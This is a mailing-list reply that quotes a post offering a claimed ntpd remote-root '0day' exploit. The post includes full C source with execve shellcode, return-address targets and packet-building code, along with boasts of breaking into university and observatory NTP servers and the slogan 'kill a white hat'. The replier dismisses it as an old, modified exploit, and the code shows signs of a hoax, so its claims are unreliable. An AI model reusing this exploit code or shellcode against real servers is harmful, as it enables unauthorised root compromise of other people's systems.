omfg i hope it isn't marcos flavio who invented that shit again (100% old-modified exploit & fake site) or get a fucking brain man!
http://downloads.securityfocus.com/vulnerabilities/exploits/ntpd-exp.c > > > We are a cell of pr0j3kt m4yh3m in Latin America and western Europe. > We have owned many research centers in Latin America, for example the > ntp server at Observatorio Nacional, USP and UFRJ, in Brazil, home of our > member > ronaldinh0 and in many european universities,specially those ones knownby > their > high-profile computer science departments That's all. Keep the fucking > pr0j3kt m4yh3m > alive. Don't be confused by the evil words of > the CISSPs and white hats. > > <-->ntpd_stack_evasion.c<--> > /* ntpd remote root no-exec stack evasion spl0it > * by m0sk0v > * > * Ntpd is time protocol most used in *nix distros. > * > * Due to a buffer overflow in dump_srv.c is possible to execute > * arbitrary code in remote host by setting "HUG=" variable > * upon time protocol. > * > * This works even on stack protection using heap to > * alock data > * > * 0day!!!!! > * 0day!!!!! > * 0day!!!!! > * 0day!!!!! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * > * > * Gr33tZ to : > * Marcos Flavio Assuncao (defhack.com), Denny Roger/www.batori.com.br > (thx for > * the shellcode, buddy!), ACME Security (www.acmesecurity.org), ksh > * > * [m0sk0v_at_cipsko m0sk0v]$ ./ntpd_stack_evasion.c -t2 localhost > * ntpd_stack_evasion.c by m0sk0v > * > * Selected platform: RedHat Linux 9.0 with ntpd 4.0.99k-RPM (/tmp/sh) > * > * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query > * [1] <- evil query (pkt = 512 | shell = 45) > * [2] <- null query (pkt = 12) > * /tmp/sh was hacked. > * [m0sk0v_at_cipsko m0sk0v]$ ls -al /tmp/suid-shell > * -rwsr-xr-x 1 root bin 512540 Aug 22 2005 /tmp/suid-shell > * > */ > > #include <stdio.h> > #include <stdlib.h > > #include <stdarg.h> > #include <string.h> > #include <sys/types.h> > #include <sys/socket.h> > #include <netinet/in.h> > #include <netdb.h> > #include <unistd.h> > #include <arpa/inet.h> > > #define NOP 0x90 > #define ADDRS 8 > #define PKTSIZ 512 > > static char usage[] = "Use: ntpd_stack_evasion.c [-o offset] <-t type> > <hostname>"; > > /* generic execve() shellcodes */ > > char lin_execve[] = > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > > "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; > > char bsd_execve[] = > /* specially made by denny_at_batori.com.br for ntpd_stack_evasion.c by > m0sk0v */ > /* thanks for that, buddy! */ > "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" > "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" > "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/suid-shell\x01\x01" > > "\x01\x01\x02\x02\x02\x02\x03\x00\x03\x03\x03\x9a\x04\x04\x04\x07\x04"; > > struct platforms > { > char *os; > char *version; > char *code; > long ret; > int align; > int shalign; > int port; > }; > > > struct platforms targ[] = > { > { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve, > 0xbfbff8bc, 200, 220, 0 }, > > { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve, > 0xbfbff540, 200, 220, 0 }, > > { "RedHat Linux 9.0", "4.0.99k-RPM (/tmp/suid-shell)", lin_execve, > 0xbffff777, 240, 160, 0 }, > > { NULL, NULL, NULL, 0x0, 0, 0, 0 } > }; > > long getip(name) > char *name; > { > struct hostent *hp; > long ip; > extern int h_errno; > > if ((ip = inet_addr(name)) < 0) > { > if (!(hp = gethostbyname(name))) > { > fprintf(stderr, "gethostbyname(): %s\n", > strerror(h_errno)); > exit(1); > } > memcpy(&ip, (hp->h_addr), 4); > } > > return ip; > } > > int doquery(host, ret, shellcode, align, shalign) > char *host, *shellcode; > long ret; > int align, shalign; > { > /* tcpdump-based reverse engineering :)) */ > > char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61, > 0x74, 0x75, 0x6d, 0x3d }; > > char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00 }; > > char buf[PKTSIZ], *p; > long *ap; > int i; > > int sockfd; > struct sockaddr_in sa; > > bzero(&sa, sizeof(sa)); > > sa.sin_family = AF_INET; > sa.sin_port = htons(123); > sa.sin_addr.s_addr = getip(host); > > if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) > { > perror("socket"); > return -1; > } > > if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0) > { > perror("connect"); > close(sockfd); > return -1; > } > > memset(buf, NOP, PKTSIZ); > memcpy(buf, q2, sizeof(q2)); > > p = buf + align; > ap = (unsigned long *)p; > > for(i=0;i<ADDRS/4;i++) > *ap++ = ret; > > p = (char *)ap; > > memcpy(buf+shalign, shellcode, strlen(shellcode)); > > if((write(sockfd, buf, PKTSIZ)) < 0) > { > perror("write"); > close(sockfd); > return -1; > } > > fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ, > strlen(shellcode)); > fflush(stderr); > > if ((write(sockfd, q3, sizeof(q3))) < 0) > { > perror("write"); > close(sockfd); > return -1; > } > > fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3)); > fflush(stderr); > > close(sockfd); > > return 0; > } > > int main(argc, argv) > int argc; > char **argv; > { > extern int optind, opterr; > extern char *optarg; > int ch, type, ofs, i; > long ret; > > opterr = ofs = 0; > type = -1; > > while ((ch = getopt(argc, argv, "t:o:")) != -1) > switch((char)ch) > { > case 't': > type = atoi(optarg); > break; > > case 'o': > ofs = atoi(optarg); > break; > > case '?': > default: > puts(usage); > exit(0); > > } > > argc -= optind; > argv += optind; > > fprintf(stderr, "ntpd_stack_evasion.c by m0sk1t0\n\n"); > > if (type < 0) > { > fprintf(stderr, "Please select platform:\n"); > for (i=0;targ[i].os;i++) > { > fprintf(stderr, "\t-t %d : %s %s (%p)\n", i, > targ[i].os, targ[i].version, (void *)targ[i].ret); > } > > exit(0); > } > > fprintf(stderr, "Selected platform: %s with ntpd %s\n\n", > targ[type].os, targ[type].version); > > ret = targ[type].ret; > ret += ofs; > > if (argc != 1) > { > puts(usage); > exit(0); > } > > fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending > query\n", > (void *)ret, targ[type].align, targ[type].shalign); > > if (doquery(*argv, ret, targ[type].code, targ[type].align, > targ[type].shalign) < 0) > { > fprintf(stderr, "Failed.\n"); > exit(1); > } > > fprintf(stderr, "Done.\n"); > > if (!targ[type].port) > { > fprintf(stderr, "/tmp/suid-shell was hacked.\n"); > exit(0); > } > > exit(0); > } > <-->ntpd_stack_evasion.c<--> > > Thanks to Denny Roger @ Batori Software for his support > > -- > bitwarz Security Team !bST > http://bitwarz.narod.ru > > # Save a bug, kill a white hat! > > > -- > bitwarz Security Team !bST > http://bitwarz.narod.ru > > # Save a bug, kill a white hat! > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
